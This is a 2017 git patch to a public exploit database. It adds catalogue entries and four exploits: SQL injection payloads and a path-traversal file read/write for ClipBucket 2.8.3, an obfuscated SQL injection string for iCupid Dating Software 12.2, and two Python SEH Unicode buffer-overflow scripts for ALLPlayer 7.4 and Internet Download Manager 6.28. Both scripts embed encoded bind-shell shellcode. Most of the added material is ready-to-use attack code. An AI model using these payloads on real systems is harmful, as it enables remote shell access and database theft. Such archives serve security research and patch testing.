From c76dbe0defbf3b3a9415f9e6f96c6877a81344bd Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 16 Aug 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-08-16 4 new exploits Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006) Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006) ALLPlayer 7.4 - Buffer Overflow (SEH Unicode) Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode) Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting AdvanDate iCupid Dating Software 12.2 - SQL Injection ClipBucket 2.8.3 - Multiple Vulnerabilities --- files.csv | 10 +++-- platforms/php/webapps/42457.txt | 65 ++++++++++++++++++++++++++++++ platforms/php/webapps/42458.txt | 28 +++++++++++++ platforms/windows/local/42455.py | 54 +++++++++++++++++++++++++ platforms/windows/local/42456.py | 69 ++++++++++++++++++++++++++++++++ 5 files changed, 223 insertions(+), 3 deletions(-) create mode 100755 platforms/php/webapps/42457.txt create mode 100755 platforms/php/webapps/42458.txt create mode 100755 platforms/windows/local/42455.py create mode 100755 platforms/windows/local/42456.py diff --git a/files.csv b/files.csv index 2f4ace62b..853f36f7a 100644 --- a/files.csv +++ b/files.csv @@ -5392,7 +5392,7 @@ id,file,description,date,author,platform,type,port 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0 -41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0 +41454,platforms/windows/dos/41454.html,"Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0 @@ -5429,7 +5429,7 @@ id,file,description,date,author,platform,type,port 41658,platforms/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0 41659,platforms/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0 41660,platforms/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos,0 -41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0 +41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0 41667,platforms/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos,0 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0 @@ -9180,6 +9180,8 @@ id,file,description,date,author,platform,type,port 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0 +42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 +42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -37999,7 +38001,7 @@ id,file,description,date,author,platform,type,port 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0 -42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0 +42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0 @@ -38254,3 +38256,5 @@ id,file,description,date,author,platform,type,port 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0 +42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0 +42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0 diff --git a/platforms/php/webapps/42457.txt b/platforms/php/webapps/42457.txt new file mode 100755 index 000000000..990faede9 --- /dev/null +++ b/platforms/php/webapps/42457.txt @@ -0,0 +1,65 @@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +.:. Exploit Title > ClipBucket 2.8.3 - Multiple Vulnerabilities + +.:. Google Dorks .:. +"Forged by ClipBucket" +inurl:view_collection.php?cid= + +.:. Date: August 15, 2017 + +.:. Exploit Author: bRpsd +.:. Skype contact: vegnox +.:. Mail contact: cy@live.no + +.:. Vendor Homepage > https://clipbucket.com/latest +.:. Software Link > https://github.com/arslancb/clipbucket/archive/4829.zip +.:. Version: 2.8.3 latest! +.:. Tested on > Linux, on local xampp +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + +Vulnerability 1: Blind SQL Injection + +Type: boolean +File: /view_collection.php +Parameter: cid + + +.:. POC .:. + +http://localhost/view_collection.php?cid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--&type=photos [columns count] +http://localhost/view_collection.php?cid=1 AND 1=1&type=photos [true] +http://localhost/view_collection.php?cid=1 AND 1=2&type=photos [false] + + + + + +Vulnerability 2: Arbitrary File Read/Write + +NOTE: Access Requires Admin Privilege! + +File: /admin_area/template_editor.php +Parameter: file + +.:. POC .:. + +The template editor is suppose to allow editing html/css files only, but if you modify the file parameter you can escape the template directory then view OR edit any file actually of any extension. + +http://localhost/admin_area/template_editor.php?dir=cb_28&file=../../../index.php&folder=layout + + + + + +Vulnerability 3: Default & Weak admin password + +When you setup the CMS, the admin password is autocomplete set as [admin] unless you change it, lazy people will skip changing that field and end up having username and password as 'admin' which is pretty easy to guess! + + + + + + +-Be safe. \ No newline at end of file diff --git a/platforms/php/webapps/42458.txt b/platforms/php/webapps/42458.txt new file mode 100755 index 000000000..2469addb7 --- /dev/null +++ b/platforms/php/webapps/42458.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: iCupid Dating Software 12.2 - SQL Injection +# Dork: N/A +# Date: 15.08.2017 +# Vendor Homepage : https://www.advandate.com/ +# Software Link: https://www.advandate.com/dating-software-features/ +# Demo: https://demo.advandate.com/ +# Version: 12.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?dll=music&sub=search&keyword=[SQL] +# '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''=' +# +# Etc... +# # # # # + + diff --git a/platforms/windows/local/42455.py b/platforms/windows/local/42455.py new file mode 100755 index 000000000..c291a38e4 --- /dev/null +++ b/platforms/windows/local/42455.py @@ -0,0 +1,54 @@ +#!/usr/bin/python +# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) +# Version: 7.4 +# Date: 15-08-2017 +# Exploit Author: f3ci +# Tested on: Windows 7 SP1 x86 + +head = "http://" +seh = "\x0f\x47" #0x0047000f +nseh = "\x61\x41" #popad align +junk = "\x41" * 301 +junk2 = "\x41" * 45 + +#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed +BufferRegister=EAX -f python +#x86/unicode_mixed succeeded with size 782 (iteration=0) +#Payload size: 782 bytes +buf = "" +buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ" +buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" +buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk" +buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7" +buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9" +buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M" +buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD" +buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB" +buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj" +buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP" +buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW" +buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM" +buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F" +buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv" +buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA" + +#venetian +ven = "\x56" #push esi +ven += "\x41" #align +ven += "\x58" #pop eax +ven += "\x41" #align +ven += "\x05\x04\x01" #add eax,01000400 +ven += "\x41" #align +ven += "\x2d\x01\x01" #add eax,01000100 +ven += "\x41" #align +ven += "\x50" #push eax +ven += "\x41" #align +ven += "\xc3" #ret + +buffer = head + junk + nseh + seh + ven + junk2 + buf + +print len(buffer) +f=open("C:\Users\Lab\Desktop\player.m3u",'wb') +f.write(buffer) +f.close() + diff --git a/platforms/windows/local/42456.py b/platforms/windows/local/42456.py new file mode 100755 index 000000000..8032c4b69 --- /dev/null +++ b/platforms/windows/local/42456.py @@ -0,0 +1,69 @@ +#!/usr/bin/python +# Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' +SEH Buffer Overflow (Unicode) +# Date: 14-06-2017 +# Exploit Author: f3ci +# Tested on: Windows 7 SP1 x86 +# How to exploit: Open IDM -> Downloads -> Find -> paste exploit string +into 'Find file' text field + +#msfvenom -p windows/shell_bind_tcp LHOST=4444 -e x86/unicode_mixed +BufferRegister=EAX -a x86 --platform windows -f python +#Payload size: 782 bytes +buf = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" +buf += "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ" +buf += "1AIAIAJ11AIAIABABABQI1AIQIAIQI11" +buf += "1AIAJQYAZBABABABABkMAGB9u4JB9lK8" +buf += "4BYpIpM0QPTIwuP1y00dtKr0LpTK22Jl" +buf += "4K1Bn4TKQbMXLOWGNjNFp1KODlml31al" +buf += "zbnLKpI16olMiqfggrhrobNwrkb2N0tK" +buf += "pJmlRk0Lzq2XJCpHkQxQoaRk29o0m1wc" +buf += "dKa9jxzCmjq9dKoDdKm1fvMakOfLfavo" +buf += "jmIqHGOHGp2UzVlCqmjXoKQmKtbUhd28" +buf += "Bk28LdIq7cOvbkJlPKtK0XML9qvsDKlD" +buf += "BkjaHPayq4LdmTQK1KQQR9aJoa9oGpoo" +buf += "OoOjRkZrjKbmOmBHMcp2IpM0RH1g2SNR" +buf += "OopTqXnlQglfzgkOyEtxdPKQIpIpmYy4" +buf += "Ntb0Phlie0rKM09oXU2J9x0Yr0Xb9mq0" +buf += "r0a0npC87zZoyO9PKOj5bwBHJbkPkaQL" +buf += "e97vrJZp0VQGRHy2GknWBGYohUR7phUg" +buf += "Gy08IoyovuogqXsDXlmk8aIoXUR7dWph" +buf += "t5bNpMaQioVuQXrCbM34ypu9Gs1Gogb7" +buf += "01xvrJjr29qF8bim365wPDldoLzajaTM" +buf += "q4ldjpuvypMtR4np26of26Mv0VnnaFaF" +buf += "OcpVPhD9HLOO1vio6u2iwpNnr6pFKO00" +buf += "Ph9xBgMMOpyofuWKHpVUcrr6qXeVruUm" +buf += "3mkO9EOLlFcLJjcPyk9PRUyugK0GN3RR" +buf += "0o2Jip23yoj5AA" + +#venetian +venetian = "\x53" #push ebx +venetian += "\x42" #align +venetian += "\x58" #pop eax +venetian += "\x42" #align +venetian += "\x05\x02\x01" #add eax,01000200 +venetian += "\x42" #align +venetian += "\x2d\x01\x01" #add eax,01000100 +venetian += "\x42" #align +venetian += "\x50" #push esp +venetian += "\x42" #align +venetian += "\xC3" #ret + +nseh = "\x61\x47" # popad +seh = "\x46\x5f" # 0x005f0046 IDMan.exe + +buffer = "\x41" * 2192 #junk +buffer += nseh + seh #nseh + seh +buffer += venetian #venetian +buffer += "\x42" * 109 #junk +buffer += buf #shellcode +buffer += "HeyCanYouFind" #junk +buffer += "ThisFileHuh?" #junk + + +filename = "C:\\Users\Lab\Desktop\idm.txt" +file = open(filename, 'w') +file.write(buffer) +file.close() +print buffer +print "[+] File created successfully"